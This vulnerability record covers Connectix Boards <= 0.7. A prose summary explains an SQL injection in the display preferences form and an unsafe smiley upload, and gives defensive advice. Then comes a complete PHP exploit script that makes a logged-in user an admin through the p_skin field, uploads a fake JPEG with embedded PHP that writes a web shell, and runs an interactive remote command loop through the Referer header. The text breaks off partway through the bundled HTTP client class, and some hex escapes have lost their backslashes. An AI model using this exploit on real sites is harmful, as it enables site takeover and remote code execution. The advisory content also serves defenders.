Description
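No description provided by source. The following summary is derived only from the record below.

The record covers Connectix Boards <= 0.7 and describes two flaws that are chained: an SQL injection in the user display-preferences form, used for privilege escalation, and an unrestricted file upload in the admin smiley manager, used for code execution. The record lists no CVE identifier and names no fixed version.

SQL injection (part.userprofile.php, quoted lines 305-312): the numeric preferences are cast with (int), but `p_lang`, `p_skin` and `p_timezone` are concatenated into the `UPDATE ... users SET ...` statement as quoted strings. The only checks on `p_lang` and `p_skin` are `isLang()` and `isSkin()`, which are `is_dir()` tests on a path built from the value; an existence test on a directory does not constrain which characters reach the query. common.php (quoted lines 95-109) additionally strips the slashes that magic_quotes_gpc would have added, so nothing escapes the value before it is interpolated. Because the statement updates the users table, a modified SET clause can change columns such as `usr_class`.

File upload (admin.bbcode.php, quoted lines 95-107): the uploaded file is accepted if `getimagesize()` reports GIF, JPEG or PNG and the size is at most 20480 bytes. The destination name comes from `$_POST['sm_filenameserver']`. The `../` stripping is applied to `$filename`, but `move_uploaded_file()` is called with the raw POST value, so the stripped name is not the one used for the destination. A file that parses as an image but carries a `.php` extension is therefore stored under the web-served smileys directory.

Defensive notes: bind `p_lang`, `p_skin` and `p_timezone` as query parameters, or compare them by strict equality against the list of installed skins and languages instead of using `is_dir()`. For uploads, generate the stored file name on the server, derive the extension from the detected image type, and configure the upload directory so that scripts in it are not executed. When reviewing an installation, look for non-image files under the smileys directory and for unexpected changes to `usr_class` in the users table.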
{"href": "https://www.seebug.org/vuldb/ssvid-6248", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-02-23T00:00:00", "title": "Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6248", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2007-02-23T00:00:00", "sourceData": "\n #!/usr/bin/php\r\n<?php\r\nerror_reporting(E_ALL ^ E_NOTICE);\r\n\r\nif($argc < 9) {\r\nprint(\\\"\r\n Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit\r\n-------------------------------------------------------------------\r\nPHP conditions: none\r\n Credits: DarkFig <gmdarkfig@gmail.com>\r\n URL: http://www.acid-root.new.fr/\r\n-------------------------------------------------------------------\r\n Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]\r\n Params: -url For example http://victim.com/connectix/ \r\n -usr The username of your account\r\n -pwd The password of your account\r\n -type Privilege Escalation(1) or Code execution(2)\r\nOptions: -proxy If you wanna use a proxy <proxyhost:proxyport> \r\n -proxyauth Basic authentification <proxyuser:proxypwd> \r\n-------------------------------------------------------------------\r\n\\\"); exit(1);\r\n}\r\n\r\n$url = getparam(\\'url\\',1);\r\n$user = getparam(\\'usr\\',1);\r\n$pass = getparam(\\'pwd\\',1);\r\n$type = getparam(\\'type\\',1);\r\n$proxy = getparam(\\'proxy\\');\r\n$authp = getparam(\\'proxyauth\\');\r\n$theme = \\'Zephyr\\';\r\n\r\n$xpl = new phpsploit();\r\n$xpl->agent(\\\"Mozilla Firefox\\\");\r\n$xpl->allowredirection(1);\r\n$xpl->cookiejar(1);\r\nif($proxy) $xpl->proxy($proxy);\r\nif($authp) $xpl->proxyauth($authp);\r\n\r\nprint \\\"\r\nTrying to get logged 
in\\\";\r\n$xpl->post($url.\\'index.php?act=login\\',\\\"username=$user&password=$pass&remember=on&confirm=Connexion+%21\\\");\r\nif(preg_match(\\\"#password#\\\",$xpl->showcookie())) print \\\"\r\nLogged in\\\";\r\nelse exit(\\\"\r\nExploit failed\\\");\r\n\r\nsploit(\\\", usr_class=1\\\");\r\nif($type==1) exit(\\\"\r\nDone, $user is now admin.\\\");\r\n\r\n# Fake JPG (with php code) generated with edjpgcom.exe\r\n#\r\n# <?php $handle=fopen(\\'mdrpipicacalolxdwtf.gif.php\\',\\'w+\\');\r\n# fwrite($handle,\\'<?php @system($_SERVER[HTTP_REFERER]); ?/>\\');\r\n# fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>\r\n#\r\n$f = \\\"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60x00x60x00x00xFF\\\"\r\n .\\\"xDBx00x43x00x08x06x06x07x06x05x08x07x07x07x09x09x08x0Ax0Cx14\\\"\r\n .\\\"x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24\\\"\r\n .\\\"x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39\\\"\r\n .\\\"x3Dx38x32x3Cx2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18\\\"\r\n .\\\"x0Dx0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32x32x32\\\"\r\n .\\\"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32\\\"\r\n .\\\"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32xFFxFEx00\\\"\r\n .\\\"xA5x3Cx3Fx70x68x70x20x24x68x61x6Ex64x6Cx65x3Dx66x6Fx70x65x6E\\\"\r\n .\\\"x28x27x6Dx64x72x70x69x70x69x63x61x63x61x6Cx6Fx6Cx78x64x77x74\\\"\r\n .\\\"x66x2Ex67x69x66x2Ex70x68x70x27x2Cx27x77x2Bx27x29x3Bx66x77x72\\\"\r\n .\\\"x69x74x65x28x24x68x61x6Ex64x6Cx65x2Cx27x3Cx3Fx70x68x70x20x40\\\"\r\n .\\\"x73x79x73x74x65x6Dx28x24x5Fx53x45x52x56x45x52x5Bx48x54x54x50\\\"\r\n .\\\"x5Fx52x45x46x45x52x45x52x5Dx29x3Bx20x3Fx3Ex27x29x3Bx66x63x6C\\\"\r\n .\\\"x6Fx73x65x28x24x68x61x6Ex64x6Cx65x29x3Bx20x75x6Ex6Cx69x6Ex6B\\\"\r\n .\\\"x28x24x5Fx53x45x52x56x45x52x5Bx50x48x50x5Fx53x45x4Cx46x5Dx29\\\"\r\n .\\\"x3Bx20x3Fx3ExFFxC0x00x11x08x00x01x00x01x03x01x22x00x02x11x01\\\"\r\n .\\\"x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01x01x01x01x01x00x00x00\\\"\r\n 
.\\\"x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5\\\"\r\n .\\\"x10x00x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx01x02x03\\\"\r\n .\\\"x00x04x11x05x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1\\\"\r\n .\\\"x08x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17x18x19\\\"\r\n .\\\"x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45x46x47x48\\\"\r\n .\\\"x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74\\\"\r\n .\\\"x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8Ax92x93x94x95x96x97\\\"\r\n .\\\"x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9\\\"\r\n .\\\"xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1\\\"\r\n .\\\"xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8xF9xFAxFF\\\"\r\n .\\\"xC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01x01x00x00x00x00x00\\\"\r\n .\\\"x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x11x00x02x01\\\"\r\n .\\\"x02x04x04x03x04x07x05x04x04x00x01x02x77x00x01x02x03x11x04x05\\\"\r\n .\\\"x21x31x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1\\\"\r\n .\\\"x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19x1A\\\"\r\n .\\\"x26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47x48x49x4Ax53\\\"\r\n .\\\"x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77\\\"\r\n .\\\"x78x79x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x97x98x99\\\"\r\n .\\\"x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2\\\"\r\n .\\\"xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4\\\"\r\n .\\\"xE5xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00x0Cx03\\\"\r\n .\\\"x01x00x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x3FxFFxD9\\\";\r\n\r\n# +admin.bbcode.php\r\n# |\r\n# 95. if(isset($_POST[\\'wherefile\\'])) {\r\n# 96. if ($_POST[\\'wherefile\\']==\\'upload\\') {\r\n# 97. if (!empty($_FILES[\\'uploadimage\\'][\\'size\\'])){\r\n# 98. if ($image=getimagesize(trim($_FILES[\\'uploadimage\\'][\\'tmp_name\\']))) {\r\n# 99. $val = array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG);\r\n# 100. 
if ($_FILES[\\'uploadimage\\'][\\'size\\'] <= 20480 && in_array($image[2],$val)) {\r\n# 101. $filename = $smile->smiley_librariesdir.$_POST[\\'sm_filenameserver\\'];\r\n# 102. $filename = str_replace(\\'../\\',\\'\\',trim($filename));\r\n# 103. //si le filenameserver contient un dossier : on cr?e ce dossier:\r\n# 104. mkdirs($smile->smiley_dir.dirname($filename));\r\n# 105. if (move_uploaded_file($_FILES[\\'uploadimage\\'][\\'tmp_name\\'], $smile->smiley_dir.$_POST[\\'sm_filenameserver\\'])) {\r\n# 106. $do=true;\r\n# 107. }\r\n#\r\n$arr = array(frmdt_url => $url.\\'admin.php?act=bb&sub=4\\',\r\n \\\"sm_name\\\" => \\\":AbCdEfGhIj1234dsupersmilepowaa:\\\",\r\n \\\"sm_filenamesubdir\\\" => \\\"libraries/\\\",\r\n \\\"sm_filenameserver\\\" => \\\"xd.gif.php\\\",\r\n \\\"wherefile\\\" => \\\"upload\\\",\r\n \\\"sm_send\\\" => \\\"Confirmer\\\",\r\n \\\"uploadimage\\\" => array(frmdt_type => \\\"image/gif\\\",\r\n frmdt_filename => \\\"xd.gif.php\\\",\r\n frmdt_content => $f));\r\n$xpl->formdata($arr);\r\n$xpl->get($url.\\\"smileys/xd.gif.php\\\");\r\nprint \\\"\r\n$shell> \\\";\r\n\r\nwhile(!preg_match(\\\"#^(quit|exit)$#\\\",($cmd = trim(fgets(STDIN)))))\r\n{\r\n $xpl->addheader(\\\"Referer\\\",$cmd);\r\n $xpl->get($url.\\\"smileys/mdrpipicacalolxdwtf.gif.php\\\");\r\n print $xpl->getcontent().\\\"\r\n$shell> \\\";\r\n} \r\n\r\nfunction sploit($sql)\r\n{\r\n\tglobal $url,$xpl,$theme,$user;\r\n\t$pdat = \\\"changeparams=1\\\"\r\n .\\\"&p_usrs=20\\\"\r\n .\\\"&p_topics=20\\\"\r\n .\\\"&p_msgs=15\\\"\r\n .\\\"&p_res=12\\\"\r\n .\\\"&p_skin=$theme\\\"\r\n .\\\"%00\\',usr_pref_skin=\\'$theme\\',usr_signature=(SELECT \\'[XPL_IS_OK]\\')$sql WHERE usr_name=\\'$user\\' #\\\"\r\n .\\\"&p_lang=fr\\\"\r\n .\\\"&p_timezone=1\\\";\r\n\r\n # +common.php\r\n # |\r\n # 95. 
function cleanArray(&$arr) {\r\n # 96.\tif (!empty($arr) && is_array($arr)) {\r\n # 97.\t\tforeach($arr as $k => $v) {\r\n # 98.\t\t\tif (is_array($v)) cleanArray($arr[$k]);\r\n # 99.\t\t\telse $arr[$k] = stripslashes($v);\r\n # 100.\t\t}\r\n # 101.\t}\r\n # 102. }\r\n # |\r\n # 105. if (get_magic_quotes_gpc()) {\r\n # 106.\tcleanArray($_POST);\r\n # 107.\tcleanArray($_COOKIE);\r\n # 108.\tcleanArray($_GET);\r\n # 109. }\r\n #\r\n # +part.userprofile.php\r\n # |\r\n # 305. /* Changement des param?tres d\\'affichage (pas accessible par les modos ou admins) */\r\n # 306. } elseif (isset($_POST[\\'changeparams\\']) && $edit_id==$_SESSION[\\'userid\\']) {\r\n # 307. if ( isset($_POST[\\'p_usrs\\'],$_POST[\\'p_topics\\'],$_POST[\\'p_msgs\\'],$_POST[\\'p_res\\'],$_POST[\\'p_skin\\'],$_POST[\\'p_lang\\'],$_POST[\\'p_timezone\\']) ) {\r\n # 308. if (is_numeric($_POST[\\'p_usrs\\']) && is_numeric($_POST[\\'p_topics\\']) && is_numeric($_POST[\\'p_msgs\\']) && is_numeric($_POST[\\'p_res\\']) && isLang($_POST[\\'p_lang\\']) && isSkin($_POST[\\'p_skin\\'])) {\r\n # 309. if ((int)$_POST[\\'p_usrs\\']>=5 && (int)$_POST[\\'p_usrs\\']<=50 && (int)$_POST[\\'p_topics\\']>=5 && (int)$_POST[\\'p_topics\\']<=50 && (int)$_POST[\\'p_msgs\\']>=5 && (int)$_POST[\\'p_msgs\\']<=50 && (int)$_POST[\\'p_res\\']>=5 && (int)$_POST[\\'p_res\\']<=50 && in_array($_POST[\\'p_timezone\\'],array_keys($timezones))) {\r\n # 310. 
$GLOBALS[\\'cb_db\\']->query(\\\"UPDATE \\\".$GLOBALS[\\'cb_db\\']->prefix.\\\"users SET usr_pref_msgs=\\'\\\".(int)$_POST[\\'p_msgs\\'].\\\"\\',usr_pref_usrs=\\'\\\".(int)$_POST[\\'p_usrs\\'].\\\"\\',usr_pref_topics=\\'\\\".(int)$_POST[\\'p_topics\\'].\\\"\\',usr_pref_res=\\'\\\".(int)$_POST[\\'p_res\\'].\\\"\\',usr_pref_lang=\\'\\\".$_POST[\\'p_lang\\'].\\\"\\',usr_pref_skin=\\'\\\".$_POST[\\'p_skin\\'].\\\"\\',usr_pref_timezone=\\'\\\".$_POST[\\'p_timezone\\'].\\\"\\',usr_pref_ctsummer=\\\".((int)(isset($_POST[\\'p_ctsummer\\']) && $_POST[\\'p_ctsummer\\']==\\'on\\')).\\\" WHERE usr_id=\\\".$_SESSION[\\'cb_user\\']->userid);\r\n # 311. $_SESSION[\\'cb_user\\']->reloadnext=true;\r\n # 312. redirect(manage_url(\\'index.php?act=user&editprofile=\\'.$_SESSION[\\'userid\\'].\\'&page=6\\',\\'forum-profile\\'.$_SESSION[\\'userid\\'].\\'-params.html\\'));\r\n #\r\n # +lib.cb.php\r\n # |\r\n # 117. function isLang ($langtype) {\r\n # 118.\treturn is_dir(CB_PATH.\\'lang/\\'.$langtype);\r\n # 119. }\r\n # |\r\n # 133. function isSkin ($skintype) {\r\n # 134.\treturn is_dir(CB_PATH.\\'skins/\\'.$skintype);\r\n # 135. }\r\n $xpl->post($url.\\\"index.php?act=user&editprofile=-1&page=6\\\",$pdat);\r\n $xpl->get($url.\\\"index.php?act=user&editprofile=-1&page=5\\\");\r\n \r\n if(preg_match(\\'#[XPL_IS_OK]#\\',$xpl->getcontent())) return;\r\n else exit(\\\"Exploit failed\\\");\r\n}\r\n\r\nfunction getparam($param,$opt=\\'\\')\r\n{\r\n\tglobal $argv;\r\n\tforeach($argv as $value => $key)\r\n\t{\r\n\t\tif($key == \\'-\\'.$param) return $argv[$value+1];\r\n\t}\r\n\tif($opt) exit(\\\"\r\n-$param parameter required\\\");\r\n\telse return;\r\n}\r\n\r\n/*\r\n * \r\n * Copyright (C) darkfig\r\n * \r\n * This program is free software; you can redistribute it and/or \r\n * modify it under the terms of the GNU General Public License \r\n * as published by the Free Software Foundation; either version 2 \r\n * of the License, or (at your option) any later version. 
\r\n * \r\n * This program is distributed in the hope that it will be useful, \r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of \r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \r\n * GNU General Public License for more details. \r\n * \r\n * You should have received a copy of the GNU General Public License \r\n * along with this program; if not, write to the Free Software \r\n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n * \r\n * TITLE: PhpSploit Class\r\n * REQUIREMENTS: PHP 5 (remove \\\"private\\\", \\\"public\\\" if you have PHP 4)\r\n * VERSION: 1.2\r\n * LICENSE: GNU General Public License\r\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\r\n * FILENAME: phpsploitclass.php\r\n *\r\n * CONTACT: gmdarkfig@gmail.com (french / english)\r\n * GREETZ: Sparah, Ddx39\r\n *\r\n * DESCRIPTION:\r\n * The phpsploit is a class implementing a web user agent.\r\n * You can add cookies, headers, use a proxy server with (or without) a\r\n * basic authentification. It supports the GET and the POST method. It can\r\n * also be used like a browser with the cookiejar() function (which allow\r\n * a server to add several cookies for the next requests) and the\r\n * allowredirection() function (which allow the script to follow all\r\n * redirections sent by the server). It can return the content (or the\r\n * headers) of the request. 
Others useful functions can be used for debugging.\r\n * A manual is actually in development but to know how to use it, you can\r\n * read the comments.\r\n *\r\n * CHANGELOG:\r\n * [2007-01-24] (1.2)\r\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\r\n * * New: multipart/form-data enctype is now supported \r\n *\r\n * [2006-12-31] (1.1)\r\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\r\n * * New: You can now call the getheader() / getcontent() function without parameters\r\n *\r\n * [2006-12-30] (1.0)\r\n * * First version\r\n * \r\n */\r\n\r\nclass phpsploit {\r\n\r\n\t/**\r\n\t * This function is called by the get()/post() functions.\r\n\t * You don\\'t have to call it, this is the main function.\r\n\t *\r\n\t * @return $server_response\r\n\t */\r\n\tprivate function sock()\r\n\t{\r\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);\r\n\t\telse $socket = fsockopen($this->host,$this->port);\r\n\t\t\r\n\t\tif(!$socket) die(\\\"Error: The host doesn\\'t exist\\\");\r\n\t\t\r\n\t\tif($this->method===\\\"get\\\") $this->packet = \\\"GET \\\".$this->url.\\\" HTTP/1.1\r\n\\\";\r\n\t\telseif($this->method===\\\"post\\\" or $this->method===\\\"formdata\\\") $this->packet = \\\"POST \\\".$this->url. 
\\\" HTTP/1.1\r\n\\\";\r\n\t\telse die(\\\"Error: Invalid method\\\");\r\n\t\t\r\n\t\tif(!empty($this->proxyuser)) $this->packet .= \\\"Proxy-Authorization: Basic \\\".base64_encode($this->proxyuser.\\\":\\\".$this->proxypass).\\\"\r\n\\\";\r\n\t\t$this->packet .= \\\"Host: \\\".$this->host.\\\"\r\n\\\";\r\n\t\t\r\n\t\tif(!empty($this->agent)) $this->packet .= \\\"User-Agent: \\\".$this->agent.\\\"\r\n\\\";\r\n\t\tif(!empty($this->header)) $this->packet .= $this->header.\\\"\r\n\\\";\r\n\t\tif(!empty($this->cookie)) $this->packet .= \\\"Cookie: \\\".$this->cookie.\\\"\r\n\\\";\r\n\t\t\r\n\t\t$this->packet .= \\\"Connection: Close\r\n\\\";\r\n\t\tif($this->method===\\\"post\\\")\r\n\t\t{\r\n\t\t\t$this->packet .= \\\"Content-Type: application/x-www-form-urlencoded\r\n\\\";\r\n\t\t\t$this->packet .= \\\"Content-Length: \\\".strlen($this->data).\\\"\r\n\r\n\\\";\r\n\t\t\t$this->packet .= $this->data.\\\"\r\n\\\";\r\n\t\t}\r\n\t\telseif($this->method===\\\"formdata\\\")\r\n\t\t{\r\n\t\t\t$this->packet .= \\\"Content-Type: multipart/form-data; boundary=---------------------------\\\".$this->boundary.\\\"\r\n\\\";\r\n\t\t\t$this->packet .= \\\"Content-Length: \\\".strlen($this->data).\\\"\r\n\r\n\\\";\r\n\t\t\t$this->packet .= $this->data;\r\n\t\t}\r\n\t\t$this->packet .= \\\"\r\n\\\";\r\n\t\t$this->recv = \\'\\';\r\n\t\t\r\n\t\tfputs($socket,$this->packet);\r\n\t\twhile(!feof($socket)) $this->recv .= fgets($socket);\r\n\t\tfclose($socket);\r\n\t\t\r\n\t\tif($this->cookiejar) $this->cookiejar($this->getheader($this->recv));\r\n\t\tif($this->allowredirection) return $this->allowredirection($this->recv);\r\n\t\telse return $this->recv;\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to add several cookie in the\r\n\t * request. 
Several methods are supported:\r\n\t * \r\n\t * $this->addcookie(\\\"name\\\",\\\"value\\\");\r\n\t * or\r\n\t * $this->addcookie(\\\"name=newvalue\\\");\r\n\t * or\r\n\t * $this->addcookie(\\\"othername=overvalue; xx=zz; y=u\\\");\r\n\t * \r\n\t * @param string $cookiename\r\n\t * @param string $cookievalue\r\n\t * \r\n\t */\r\n\tpublic function addcookie($cookn,$cookv=\\'\\')\r\n\t{\r\n\t\t// $this->addcookie(\\\"name\\\",\\\"value\\\"); work avec replace\r\n\t\tif(!empty($cookv))\r\n\t\t{\r\n\t\t\tif($cookv === \\\"deleted\\\") $cookv=\\'\\'; // cookiejar(1) && Set-Cookie: name=delete\r\n\t\t\tif(!empty($this->cookie))\r\n\t\t\t{\r\n\t\t\t if(preg_match(\\\"/$cookn=/\\\",$this->cookie))\r\n\t\t\t {\r\n\t\t\t \t$this->cookie = preg_replace(\\\"/$cookn=(S*);/\\\",\\\"$cookn=$cookv;\\\",$this->cookie);\r\n\t\t\t }\r\n\t\t\t else\r\n\t\t\t {\r\n\t\t\t \t$this->cookie .= \\\" \\\".$cookn.\\\"=\\\".$cookv.\\\";\\\"; // \\\" \\\".\r\n\t\t\t }\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->cookie = $cookn.\\\"=\\\".$cookv.\\\";\\\";\r\n\t\t\t}\r\n\t\t}\r\n\t\t// $this->addcookie(\\\"name=value; othername=othervalue\\\");\r\n\t\telse\r\n\t\t{\r\n\t \t if(!empty($this->cookie))\r\n\t \t {\r\n\t \t \t$cookn = preg_replace(\\\"/(.*);$/\\\",\\\"$1\\\",$cookn);\r\n\t \t \t$cookarr = explode(\\\";\\\",str_replace(\\\" \\\", \\\"\\\",$cookn));\r\n\t \t \tfor($i=0;$i<count($cookarr);$i++)\r\n\t \t \t{\r\n\t \t \t\tpreg_match(\\\"/(S*)=(S*)/\\\",$cookarr[$i],$matches);\r\n\t \t \t\t$cookn = $matches[1];\r\n\t \t \t\t$cookv = $matches[2];\r\n\t \t \t\t$this->addcookie($cookn,$cookv);\r\n\t \t \t}\r\n\t \t }\r\n\t\t\t else\r\n\t\t\t {\r\n\t\t\t \t$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\\\";\\\") ? $cookn : $cookn.\\\";\\\";\r\n\t\t\t \t$this->cookie = $cookn;\t\t\t\r\n\t\t\t }\r\n\t\t}\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function allows you to add several headers in the\r\n\t * request. 
Several methods are supported:\r\n\t *\r\n\t * $this->addheader(\\\"headername\\\",\\\"headervalue\\\");\r\n\t * or\r\n\t * $this->addheader(\\\"headername: headervalue\\\");\r\n\t *\r\n\t * @param string $headername\r\n\t * @param string $headervalue\r\n\t */\r\n\tpublic function addheader($headern,$headervalue=\\'\\')\r\n\t{\r\n\t\t// $this->addheader(\\\"name\\\",\\\"value\\\");\r\n\t\tif(!empty($headervalue))\r\n\t\t{\r\n\t\t\tif(!empty($this->header))\r\n\t\t\t{\r\n\t\t\t\tif(preg_match(\\\"/$headern:/\\\",$this->header))\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->header = preg_replace(\\\"/$headern: (S*)/\\\",\\\"$headern: $headervalue\\\",$this->header);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->header .= \\\"\r\n\\\".$headern.\\\": \\\".$headervalue;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->header=$headern.\\\": \\\".$headervalue;\r\n\t\t\t}\r\n\t\t}\r\n\t\t// $this->addheader(\\\"name: value\\\");\r\n\t\telse \r\n\t\t{\r\n\t\t\tif(!empty($this->header))\r\n\t\t\t{\r\n\t\t\t\t$headarr = explode(\\\": \\\",$headern);\r\n\t\t\t\t$headern = $headarr[0];\r\n\t\t\t\t$headerv = $headarr[1];\r\n\t\t\t\t$this->addheader($headern,$headerv);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->header=$headern;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to use an http proxy server.\r\n\t * Several methods are supported:\r\n\t * \r\n\t * $this->proxy(\\\"proxyip\\\",\\\"8118\\\");\r\n\t * or\r\n\t * $this->proxy(\\\"proxyip:8118\\\")\r\n\t *\r\n\t * @param string $proxyhost\r\n\t * @param integer $proxyport\r\n\t */\r\n\tpublic function proxy($proxy,$proxyp=\\'\\')\r\n\t{\r\n\t\t// $this->proxy(\\\"localhost:8118\\\");\r\n\t\tif(empty($proxyp))\r\n\t\t{\r\n\t\t\tpreg_match(\\\"/^(S*):(d+)$/\\\",$proxy,$proxarr);\r\n\t\t\t$proxh = $proxarr[1];\r\n\t\t\t$proxp = $proxarr[2];\r\n\t\t\t$this->proxyhost=$proxh;\r\n\t\t\t$this->proxyport=$proxp;\r\n\t\t}\r\n\t\t// 
$this->proxy(\\\"localhost\\\",8118);\r\n\t\telse \r\n\t\t{\r\n\t\t\t$this->proxyhost=$proxy;\r\n\t\t\t$this->proxyport=intval($proxyp);\r\n\t\t}\r\n\t\tif($this->proxyport > 65535) die(\\\"Error: Invalid port number\\\");\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to use an http proxy server\r\n\t * which requires a basic authentification. Several\r\n\t * methods are supported:\r\n\t * \r\n\t * $this->proxyauth(\\\"darkfig\\\",\\\"dapasswd\\\");\r\n\t * or\r\n\t * $this->proxyauth(\\\"darkfig:dapasswd\\\");\r\n\t *\r\n\t * @param string $proxyuser\r\n\t * @param string $proxypass\r\n\t */\r\n\tpublic function proxyauth($proxyauth,$proxypasse=\\'\\')\r\n\t{\r\n\t\t// $this->proxyauth(\\\"darkfig:password\\\");\r\n\t\tif(empty($proxypasse))\r\n\t\t{\r\n\t\t\tpreg_match(\\\"/^(.*):(.*)$/\\\",$proxyauth,$proxautharr);\r\n\t\t\t$proxu = $proxautharr[1];\r\n\t\t\t$proxp = $proxautharr[2];\r\n\t\t\t$this->proxyuser=$proxu;\r\n\t\t\t$this->proxypass=$proxp;\r\n\t\t}\r\n\t\t// $this->proxyauth(\\\"darkfig\\\",\\\"password\\\");\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->proxyuser=$proxyauth;\r\n\t\t\t$this->proxypass=$proxypasse;\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function allows you to set the \\\"User-Agent\\\" header.\r\n\t * Several methods are possible to do that:\r\n\t * \r\n\t * $this->agent(\\\"Mozilla Firefox\\\");\r\n\t * or\r\n\t * $this->addheader(\\\"User-Agent: Mozilla Firefox\\\");\r\n\t * or\r\n\t * $this->addheader(\\\"User-Agent\\\",\\\"Mozilla Firefox\\\");\r\n\t * \r\n\t * @param string $useragent\r\n\t */\r\n\tpublic function agent($useragent)\r\n\t{\r\n\t\t$this->agent=$useragent;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the header which will be\r\n\t * in the next request.\r\n\t * \r\n\t * $this->showheader();\r\n\t *\r\n\t * @return $header\r\n\t */\r\n\tpublic function showheader()\r\n\t{\r\n\t\treturn $this->header;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the cookie which will be\r\n\t * in the 
next request.\r\n\t * \r\n\t * $this->showcookie();\r\n\t *\r\n\t * @return $storedcookies\r\n\t */\r\n\tpublic function showcookie()\r\n\t{\r\n\t\treturn $this->cookie;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the last formed\r\n\t * http request (the http packet).\r\n\t * \r\n\t * $this->showlastrequest();\r\n\t * \r\n\t * @return $last_http_request\r\n\t */\r\n\tpublic function showlastrequest()\r\n\t{\r\n\t\treturn $this->packet;\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * GET method. You can precise the port of the host.\r\n\t * \r\n\t * $this->get(\\\"http://localhost\\\");\r\n\t * $this->get(\\\"http://localhost:888/xd/tst.php\\\");\r\n\t * \r\n\t * @param string $urlwithpath\r\n\t * @return $server_response\r\n\t */\r\n\tpublic function get($url)\r\n\t{\r\n\t\t$this->target($url);\r\n\t\t$this->method=\\\"get\\\";\r\n\t\treturn $this->sock();\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * POST method. You can precise the port of the host.\r\n\t * \r\n\t * $this->post(\\\"http://localhost/index.php\\\",\\\"admin=1&user=dark\\\");\r\n\t *\r\n\t * @param string $urlwithpath\r\n\t * @param string $postdata\r\n\t * @return $server_response\r\n\t */\t\r\n\tpublic function post($url,$data)\r\n\t{\r\n\t\t$this->target($url);\r\n\t\t$this->method=\\\"post\\\";\r\n\t\t$this->data=$data;\r\n\t\treturn $this->sock();\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * POST method using the multipart/form-data enctype. 
